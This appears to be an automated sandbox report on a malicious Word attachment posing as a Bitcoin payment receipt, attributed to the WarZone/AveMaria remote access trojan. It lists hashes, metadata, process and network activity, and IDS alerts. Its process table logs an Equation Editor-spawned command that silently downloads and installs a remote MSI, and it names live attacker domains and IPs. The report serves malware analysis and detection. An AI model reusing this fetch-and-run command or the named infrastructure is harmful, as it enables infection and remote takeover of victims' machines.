File name: | BTC_payment_receipt.docx |
Full analysis: | https://app.any.run/tasks/5172baac-6577-4b01-9ad8-00602a8d4753 |
Verdict: | Malicious activity |
Threats: | WarZone RAT is a remote access trojan, which is written in C++ and offered as a malware-as-a-service. It packs a wide range of capabilities, from stealing victims’ files and passwords to capturing desktop activities. WarZone RAT is primarily distributed via phishing emails and receives regular updates from its C2. |
Analysis date: | May 20, 2019, 09:38:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 2D49AC3E13B74DF4C3892E6889AB2E21 |
SHA1: | F1A360822C2828F9165143CA59E1C67837671903 |
SHA256: | FDEC22B9DE8580661228149F50D3207605372FA0F880C2B45D05F715702B1F7D |
SSDEEP: | 384:X6ma3W6PYcpf4MS+pG7hvWvRG95OQJJflgI4yFJexEtxI:qmURPYchg5mRG95OQJJfWxTiI |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0x2c2fab17 |
ZipCompressedSize: | 350 |
ZipUncompressedSize: | 1364 |
ZipFileName: | [Content_Types].xml |
Template: | template.dotx |
---|---|
TotalEditTime: | - |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 1 |
Paragraphs: | 1 |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | - |
Company: | - |
LinksUpToDate: | No |
CharactersWithSpaces: | 1 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 15 |
Keywords: | - |
LastModifiedBy: | Richard |
RevisionNumber: | 2 |
CreateDate: | 2019:05:16 12:01:00Z |
ModifyDate: | 2019:05:16 12:01:00Z |
Title: | - |
---|---|
Subject: | - |
Creator: | Richard |
Description: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\BTC_payment_receipt.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.5123.5000 | ||||
2824 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2760 | cmd.exe & /C CD C: & msiexec.exe /i https://servers.intlde.com/protected.msi /quiet | C:\Windows\SysWOW64\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2308 | msiexec.exe /i https://servers.intlde.com/protected.msi /quiet | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2392 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2836 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3008 | cmd.exe & /C CD C: & msiexec.exe /i https://servers.intlde.com/protected.msi /quiet | C:\Windows\SysWOW64\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1618 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2140 | msiexec.exe /i https://servers.intlde.com/protected.msi /quiet | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1618 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2788 | "C:\Windows\Installer\MSIB35C.tmp" | C:\Windows\Installer\MSIB35C.tmp | — | msiexec.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2188 | "C:\Windows\Installer\MSIB35C.tmp" | C:\Windows\Installer\MSIB35C.tmp | MSIB35C.tmp | |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF9ED.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{19D1DEB7-F199-4586-98A4-30B1F3A32087} | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{BB1B7DE3-150E-4AAA-8B21-C3A31CC6F593} | — | |
MD5:— | SHA256:— | |||
2392 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF7796F2E6638DBACC.TMP | — | |
MD5:— | SHA256:— | |||
2392 | msiexec.exe | C:\Config.Msi\1cb1c5.rbs | — | |
MD5:— | SHA256:— | |||
2392 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFF5F0096BF6410B2F.TMP | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F6FEF2FA-5C69-454E-B101-82B8C72DD6B8}.tmp | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{63E73756-845F-4BBA-AB6A-5A1ABF11E0E8}.tmp | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{422E727A-3D9C-4414-8799-EFE3D14D345B}.tmp | — | |
MD5:— | SHA256:— | |||
2868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4DE8717A-1072-4002-8F82-D25DD612444E}.tmp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2868 | WINWORD.EXE | HEAD | 200 | 198.252.108.62:443 | https://servers.intlde.com/protected.doc | CA | — | — | unknown |
2868 | WINWORD.EXE | GET | 200 | 198.252.108.62:443 | https://servers.intlde.com/protected.doc | CA | text | 261 Kb | unknown |
2868 | WINWORD.EXE | OPTIONS | 200 | 198.252.108.62:443 | https://servers.intlde.com/ | CA | html | 1.15 Kb | unknown |
2868 | WINWORD.EXE | HEAD | 200 | 198.252.108.62:443 | https://servers.intlde.com/protected.doc | CA | — | — | unknown |
844 | svchost.exe | OPTIONS | 200 | 198.252.108.62:443 | https://servers.intlde.com/ | CA | html | 1.15 Kb | unknown |
844 | svchost.exe | PROPFIND | 200 | 198.252.108.62:443 | https://servers.intlde.com/ | CA | html | 1.15 Kb | unknown |
844 | svchost.exe | PROPFIND | 200 | 198.252.108.62:443 | https://servers.intlde.com/ | CA | html | 1.15 Kb | unknown |
844 | svchost.exe | PROPFIND | 200 | 198.252.108.62:443 | https://servers.intlde.com/ | CA | html | 1.15 Kb | unknown |
844 | svchost.exe | PROPFIND | 200 | 198.252.108.62:443 | https://servers.intlde.com/ | CA | html | 1.15 Kb | unknown |
2392 | msiexec.exe | GET | 200 | 198.252.108.62:443 | https://servers.intlde.com/protected.msi | CA | executable | 906 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
844 | svchost.exe | 198.252.108.62:443 | servers.intlde.com | Hawk Host Inc. | CA | unknown |
2392 | msiexec.exe | 198.252.108.62:443 | servers.intlde.com | Hawk Host Inc. | CA | unknown |
2868 | WINWORD.EXE | 198.252.108.62:443 | servers.intlde.com | Hawk Host Inc. | CA | unknown |
2832 | images.exe | 88.202.177.235:5200 | fada101.servehttp.com | UK-2 Limited | NL | malicious |
Domain | IP | Reputation |
---|---|---|
servers.intlde.com |
| unknown |
fada101.servehttp.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2832 | images.exe | A Network Trojan was detected | MALWARE [PTsecurity] AveMaria.RAT Encrypted Checkin |
2832 | images.exe | A Network Trojan was detected | MALWARE [PTsecurity] AveMaria.RAT Connection |